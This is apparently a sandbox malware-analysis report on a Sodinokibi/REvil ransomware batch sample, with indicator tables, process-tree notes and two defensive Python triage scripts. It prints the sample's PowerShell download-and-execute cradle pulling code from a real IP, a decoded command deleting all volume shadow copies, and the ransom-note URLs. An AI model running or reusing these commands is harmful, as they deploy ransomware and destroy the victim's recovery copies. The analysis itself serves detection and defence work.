Analysis
- max time kernel: 141s
- max time network: 158s
- platform: windows7_x64
- resource: win7v200430
- submitted: 01-05-2020 13:10
Static task: static1
Behavioral task: behavioral1 (Sample 46MBBJZz.bat, Resource win7v200430). The results below are from this task; the analysis header's resource win7v200430 matches it.
Behavioral task: behavioral2 (Sample 46MBBJZz.bat, Resource win10v200430)
General
- Target: 46MBBJZz.bat
- Size: 189B
- MD5: c7b71aa9749be55225b17bbaf4b4b9a1
- SHA1: ec46d8385341aa2152b70d834c898c5fd9c82284
- SHA256: ca27de823967366e96e0623a33820b1713b1e19439c82d81fe6521e04da48dcb
- SHA512: 3c0c57b1384957bcf30d3c079c6fc7c4a48be99a2148490e078eaa1809dd87d2e5f047f457cc8c9f2e6518f5ef8177d73f739c27076f45ec5deae04be4590e8d
Malware Config
Extracted (stage-two download location, taken from the loader command line in the process tree)
- URL: http://185.103.242.78/pastes/46MBBJZz
Extracted (ransom note)
- Path: C:\12361-readme.txt
- Family: sodinokibi
- URLs:
  - http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/8CCF28A78ADBB62E
  - http://decryptor.cc/8CCF28A78ADBB62E
Both note URLs (Tor hidden service and its clearnet mirror decryptor.cc) end in the same per-victim token, 8CCF28A78ADBB62E; that token, not the domain, is what identifies this infection to the operators.
Signatures

Suspicious use of WriteProcessMemory (5 IoCs)
Processes:
- PID 1400 cmd.exe wrote to memory of PID 1480 powershell.exe
- PID 1480 powershell.exe wrote to memory of PID 1660 powershell.exe (4 times)
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes:
- PID 1480 powershell.exe (3 times)
- PID 1660 powershell.exe (2 times)
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes:
- powershell.exe: Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\iay8505mx.bmp"
The bitmap is a randomly named file the stage-two script wrote to the user's Temp directory; the write is made by the stage-one PowerShell process (PID 1480), the same process that drops the ransom notes.
Makes http(s) request (41 IoCs)
Contacts server via http/https, possibly for C2 communication.
Processes (flow: HTTP URL, sorted by flow):
- 2: http://185.103.242.78/pastes/46MBBJZz
- 7: https://educar.org/include/images/tkaeigjwav.png
- 9: https://www.educar.org/
- 14: https://alsace-first.com/static/graphic/xd.png
- 16: http://apps.identrust.com/roots/dstrootcax3.p7c
- 18: http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
- 42: https://sporthamper.com/data/temp/irgwma.gif
- 51: https://dirittosanitario.biz/data/images/yklhziiwzwwv.jpg
- 53: https://socialonemedia.com/content/image/vsdw.png
- 64: https://smartypractice.com/uploads/images/hnowxgmt.jpg
- 82: https://berliner-versicherungsvergleich.de/bausparen/
- 84: https://ivfminiua.com/include/images/tfcztxmiyb.gif
- 98: https://alysonhoward.com/content/graphic/glaqgyyycmwv.gif
- 100: https://braffinjurylawfirm.com/content/pics/euwfipvt.jpg
- 104: https://dw-css.de/news/graphic/mpal.gif
- 109: https://c-a.co.in/static/tmp/mzps.gif
- 140: https://brandl-blumen.de/include/images/fxezgtnbtt.jpg
- 143: https://despedidascostablanca.es/static/temp/hdoq.png
- 180: https://ladelirante.fr/uploads/tmp/iduirdbr.jpg
- 182: https://evologic-technologies.com/admin/graphic/nzgj.png
- 183: http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
- 187: https://tecnojobsnet.com/static/assets/kevpwaja.gif
- 192: https://dontpassthepepper.com/wp-content/graphic/qcazjqtpkx.jpg
- 208: https://citymax-cr.com/include/graphic/oipvyaydawyh.jpg
- 210: https://www.citymax-cr.com/include/graphic/oipvyaydawyh.jpg
- 214: https://videomarketing.pro/static/graphic/mlhj.gif
- 219: https://bristolaeroclub.co.uk/news/images/ukla.jpg
- 221: https://www.bristolaeroclub.co.uk/news/images/ukla.jpg
- 239: https://latestmodsapks.com/content/images/cqgr.jpg
- 240: https://latestmodsapks.com/cgi-sys/suspendedpage.cgi
- 244: https://interactcenter.org/static/graphic/qgbmdvxcnbay.jpg
- 246: https://theduke.de/uploads/tmp/gdip.jpg
- 248: https://hrabritelefon.hr/admin/tmp/mdpivdqd.jpg
- 256: https://hoteledenpadova.it/wp-content/game/uaramq.png
- 262: http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt
- 264: https://work2live.de/static/pics/vtkpactifn.png
- 269: https://tetinfo.in/static/images/eg.png
- 271: https://www.tetinfo.in/
- 275: https://chavesdoareeiro.com/include/graphic/pgkbtsmm.jpg
- 277: https://365questions.org/news/assets/ysnzfpyd.gif
- 279: https://newstap.com.ng/admin/graphic/juxo.png
Reading the table: flow 2 is the stage-two fetch from the loader command line. Flows 16, 18, 183 and 262 are Windows CryptoAPI fetching CA certificates and the AuthRoot certificate trust list as a side effect of the many TLS connections (they are what drives the certificate store signature further down); they are not attacker infrastructure. Every other request goes to an unrelated third-party domain with a path of the form /<dir>/<dir>/<random lowercase name>.(jpg|png|gif), which is the Sodinokibi check-in shape. The www./root and suspendedpage.cgi entries that follow a check-in on the same host (7/9, 208/210, 219/221, 239/240, 269/271) are most likely the servers' redirects to those check-ins. Blocking or hunting on the domains alone is low value, since these are compromised legitimate sites; the path shape is the durable indicator.
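As an added example (the editor's code, not part of the sandbox report or the sample), the following Python sorts the URLs from this table into the four buckets described above: the stage-two fetch, CryptoAPI certificate fetches, beacon-shaped check-ins, and everything else. The URL rows are copied from the report; the host list, the path regex and the category names are the editor's assumptions, not logic from the sandbox.

```python
"""Classify URLs from a sandbox 'Makes http(s) request' table.

Added example: the URL rows are copied from this report, the category rules
are the editor's own assumptions and not the sandbox's logic.
"""
import re
from urllib.parse import urlparse

# Hosts Windows CryptoAPI contacts on its own to fetch CA certificates and the
# AuthRoot certificate trust list when a process makes TLS connections.
CAPI_HOSTS = {
    "crt.usertrust.com",
    "apps.identrust.com",
    "www.download.windowsupdate.com",
}

# Stage-two download location from the loader command line in this report.
STAGER_URL = "http://185.103.242.78/pastes/46MBBJZz"

# Shape of the Sodinokibi/REvil check-in URLs in the table:
# /<dir>/<dir>/<random lowercase name>.<jpg|png|gif> on a third-party domain.
BEACON_PATH = re.compile(r"^/[a-z0-9_-]+/[a-z0-9_-]+/[a-z]{2,16}\.(?:jpg|png|gif)$")


def classify(url: str) -> str:
    """Return one of: stager, capi, beacon, other."""
    parsed = urlparse(url)
    host = parsed.netloc.lower()
    if url == STAGER_URL:
        return "stager"
    if host in CAPI_HOSTS:
        return "capi"
    if BEACON_PATH.match(parsed.path):
        return "beacon"
    return "other"


def triage(entries):
    """Group (flow, url) pairs by category: dict[category] -> list of (flow, url)."""
    groups = {"stager": [], "capi": [], "beacon": [], "other": []}
    for flow, url in entries:
        groups[classify(url)].append((flow, url))
    return groups


def beacon_domains(entries):
    """Deduplicated, sorted hostnames (www. stripped) of the beacon-shaped requests."""
    hosts = set()
    for _flow, url in entries:
        if classify(url) == "beacon":
            host = urlparse(url).netloc.lower()
            hosts.add(host[4:] if host.startswith("www.") else host)
    return sorted(hosts)


# Constructed subset of the 41 (flow, URL) rows in this report's table.
SAMPLE = [
    (277, "https://365questions.org/news/assets/ysnzfpyd.gif"),
    (262, "http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt"),
    (271, "https://www.tetinfo.in/"),
    (16, "http://apps.identrust.com/roots/dstrootcax3.p7c"),
    (240, "https://latestmodsapks.com/cgi-sys/suspendedpage.cgi"),
    (18, "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab"),
    (256, "https://hoteledenpadova.it/wp-content/game/uaramq.png"),
    (2, "http://185.103.242.78/pastes/46MBBJZz"),
    (82, "https://berliner-versicherungsvergleich.de/bausparen/"),
    (221, "https://www.bristolaeroclub.co.uk/news/images/ukla.jpg"),
    (208, "https://citymax-cr.com/include/graphic/oipvyaydawyh.jpg"),
]

if __name__ == "__main__":
    for category, rows in triage(SAMPLE).items():
        print(f"{category}: {len(rows)}")
        for flow, url in rows:
            print(f"  flow {flow}: {url}")
    print("beacon hosts:", beacon_domains(SAMPLE))
```

The order of the checks matters: the exact stager URL and the CryptoAPI hosts are matched first so that a path-shape rule never mislabels them, and only then is the path shape applied. Run against the full 41-row table the same rules give 1 stager, 4 CryptoAPI fetches, 32 beacon-shaped requests and 4 "other" rows (the redirect targets listed above).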
Drops file in System32 directory (1 IoC)
Processes:
- powershell.exe: File opened for modification C:\Windows\System32\CatRoot2\dberr.txt
dberr.txt is the catalog database error log that CryptoAPI maintains under CatRoot2; it is touched as a by-product of the certificate and trust-list update triggered by the TLS traffic, not a payload dropped by the sample.
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Modifies service (2 TTPs, 4 IoCs)
Processes:
- vssvc.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
- vssvc.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
- vssvc.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
- vssvc.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
These are the per-writer diagnostic keys the Volume Shadow Copy service creates when it starts. vssvc.exe (PID 1568) is started on demand by the Win32_ShadowCopy query and deletion issued from PID 1660 (see the process tree), so the signature reflects the shadow-copy wipe, not a service reconfigured by the sample.
Drops file in Program Files directory (36 IoCs)
Processes:
powershell.exe, File created (ransom note copies, 5):
- \??\c:\program files\12361-readme.txt
- \??\c:\program files (x86)\12361-readme.txt
- \??\c:\program files\microsoft sql server compact edition\12361-readme.txt
- \??\c:\program files\microsoft sql server compact edition\v3.5\12361-readme.txt
- \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\12361-readme.txt
powershell.exe, File opened for modification (31, in report order):
- \??\c:\program files\DismountOptimize.7z
- \??\c:\program files\LimitUpdate.wav
- \??\c:\program files\RedoRestore.ini
- \??\c:\program files\SubmitRead.jtx
- \??\c:\program files\UnregisterReceive.mpg
- \??\c:\program files\MeasureTrace.js
- \??\c:\program files\UninstallExpand.mp2v
- \??\c:\program files\UnpublishRepair.xls
- \??\c:\program files\MeasureInitialize.3gp
- \??\c:\program files\NewHide.ini
- \??\c:\program files\StepMerge.mp4
- \??\c:\program files\SyncResize.emf
- \??\c:\program files\AddResize.M2V
- \??\c:\program files\RedoPing.mp4
- \??\c:\program files\SearchLock.jpg
- \??\c:\program files\UninstallEnable.3g2
- \??\c:\program files\TraceCheckpoint.vsx
- \??\c:\program files\ApproveEnter.vst
- \??\c:\program files\BackupLimit.rtf
- \??\c:\program files\CompareAssert.potm
- \??\c:\program files\MeasureLock.TTS
- \??\c:\program files\OutCheckpoint.xltm
- \??\c:\program files\SaveDisconnect.avi
- \??\c:\program files\SaveProtect.xlsm
- \??\c:\program files\DisableFind.MTS
- \??\c:\program files\JoinConvertFrom.mp3
- \??\c:\program files\SuspendConvertFrom.xla
- \??\c:\program files\UndoAssert.ex_
- \??\c:\program files\WatchSend.vstm
- \??\c:\program files\ExpandSwitch.xlsm
- \??\c:\program files\SplitPublish.docm
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes:
- PID 1480 powershell.exe
Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes:
- PID 1480 powershell.exe: Token: SeDebugPrivilege (2 times)
- PID 1660 powershell.exe: Token: SeDebugPrivilege
- PID 1568 vssvc.exe: Token: SeBackupPrivilege
- PID 1568 vssvc.exe: Token: SeRestorePrivilege
- PID 1568 vssvc.exe: Token: SeAuditPrivilege
- PID 1480 powershell.exe: Token: SeTakeOwnershipPrivilege
The SeBackup/SeRestore/SeAudit enables on vssvc.exe are the service's normal behaviour. The ones to note are on the two PowerShell processes: SeDebugPrivilege in both stages, and SeTakeOwnershipPrivilege in PID 1480, which lets the encryptor take ownership of files it would otherwise be denied before modifying them.
Blacklisted process makes network request (159 IoCs; the report lists 64 of the flows)
Processes:
- PID 1480 powershell.exe, flows: 2, 7, 9, 11, 12, 14, 16, 18, 20, 21, 23, 25, 26, 28, 29, 31, 32, 34, 36, 37, 39, 40, 42, 45, 47, 49, 51, 53, 55, 56, 58, 59, 61, 62, 64, 66, 67, 69, 70, 72, 74, 76, 79, 81, 82, 84, 86, 87, 89, 90, 92, 93, 96, 98, 100, 102, 104, 106, 107, 109, 111, 112, 114, 115
Modifies system certificate store
Processes:
- powershell.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
- powershell.exe: Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (certificate blob omitted)
- powershell.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436
- powershell.exe: Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = (certificate blob omitted)
- powershell.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C
- powershell.exe: Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = (certificate blob omitted)
The three thumbprints are public roots: DAC9024F54D8F6DF94935FB1732638CA6AD77C13 is DST Root CA X3 (matching the dstrootcax3.p7c fetch in the HTTP table), A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 is DigiCert Global Root CA and B1BC968BD4F49D622AA89A81F2150152A41D829C is GlobalSign Root CA. They are written to the AuthRoot store by the Windows automatic root update (the authrootstl.cab fetches) the first time a TLS chain needs them, so this signature is a by-product of the check-in traffic. A root planted by malware to trust its own certificates would land in the ROOT store (machine or current user), which is the store to check when this signature fires.
Enumerates connected drives (3 TTPs)
Processes

C:\Windows\system32\cmd.exe (PID 1400)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\46MBBJZz.bat"
  Signatures:
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1480, child of 1400)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/46MBBJZz');Invoke-ECMOWU;Start-Sleep -s 10000"
    Signatures:
    - Suspicious use of WriteProcessMemory
    - Suspicious behavior: EnumeratesProcesses
    - Sets desktop wallpaper using registry
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of AdjustPrivilegeToken
    - Blacklisted process makes network request
    - Modifies system certificate store

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1660, child of 1480)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      Decoded -e argument (base64 of the UTF-16LE script text): Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
      Signatures:
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe (PID 1568)
  Command line: C:\Windows\system32\vssvc.exe
  Signatures:
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken

Execution chain: the 189-byte batch file does nothing but start 32-bit PowerShell with a download cradle. The script fetched from http://185.103.242.78/pastes/46MBBJZz is executed straight from memory with IEX, the function it defines (Invoke-ECMOWU) is called, and Start-Sleep -s 10000 keeps the host process alive while the payload runs. That in-memory stage is the Sodinokibi payload behind every signature on PID 1480: it sets the wallpaper, writes the 12361-readme.txt notes, modifies the files under Program Files, makes the check-in requests, and launches a second PowerShell (PID 1660) whose encoded command deletes every volume shadow copy through WMI. The Volume Shadow Copy service (vssvc.exe, PID 1568) starts on demand to serve that request, which is why it appears as a separate top-level process rather than a child of PowerShell.
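As an added example (the editor's code, not part of the sandbox report or the sample), the following Python performs the two checks an analyst wants on the command lines in this tree: decoding the -e argument back to the script PowerShell actually runs, and flagging the download-and-execute cradle and the shadow copy deletion. The two command lines are copied from the tree above; the regular expressions and finding labels are the editor's own assumptions.

```python
"""Decode and triage PowerShell command lines from a sandbox process tree.

Added example by the editor, not part of the sandbox report. The command lines
are copied from the process tree above; the regular expressions and finding
labels are the editor's own rules and are assumptions, not sandbox logic.
"""
import base64
import re

# -e / -ec / -enc / -EncodedCommand <base64>: PowerShell base64-encodes the
# UTF-16LE bytes of the script, so base64-decode then decode as UTF-16LE.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
DOWNLOAD_CRADLE = re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b")
INVOKE_EXPRESSION = re.compile(r"(?i)\b(?:iex|Invoke-Expression)\b")
SHADOW_DELETE = re.compile(r"(?i)Win32_Shadowcopy.*\.Delete\(\)")
URL = re.compile(r"https?://[^\s'\"();]+")


def decode_encoded_command(token: str) -> str:
    """Decode a PowerShell -EncodedCommand argument back to script text."""
    raw = base64.b64decode(token, validate=True)
    return raw.decode("utf-16-le").rstrip("\x00")


def effective_script(cmdline: str) -> str:
    """What PowerShell will execute: the decoded -e payload if present, else the command line."""
    match = ENCODED_FLAG.search(cmdline)
    return decode_encoded_command(match.group(1)) if match else cmdline


def triage_powershell(cmdline: str) -> dict:
    """Flag a download-and-execute cradle, WMI shadow copy deletion and a SysWOW64 host."""
    script = effective_script(cmdline)
    findings = []
    if DOWNLOAD_CRADLE.search(script) and INVOKE_EXPRESSION.search(script):
        findings.append("download-and-execute cradle")
    if SHADOW_DELETE.search(script):
        findings.append("volume shadow copy deletion via WMI")
    if "syswow64" in cmdline.lower():
        findings.append("32-bit PowerShell host (SysWOW64)")
    return {"script": script, "urls": URL.findall(script), "findings": findings}


# Command lines copied from the process tree of this report (PIDs 1480 and 1660).
STAGE1 = ('C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe '
          '"IEX (New-Object System.Net.WebClient).DownloadString('
          "'http://185.103.242.78/pastes/46MBBJZz');Invoke-ECMOWU;Start-Sleep -s 10000\"")
STAGE2 = ("powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8"
          "ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==")

if __name__ == "__main__":
    for name, cmdline in (("PID 1480", STAGE1), ("PID 1660", STAGE2)):
        result = triage_powershell(cmdline)
        print(name)
        print("  script:  ", result["script"])
        print("  urls:    ", result["urls"])
        print("  findings:", result["findings"])
```

The checks run on the decoded script rather than the raw command line, otherwise the shadow copy deletion in PID 1660 is invisible: the raw line contains nothing but a base64 blob. The same decoding step is what a detection rule needs before matching on Win32_Shadowcopy, vssadmin or wbadmin strings.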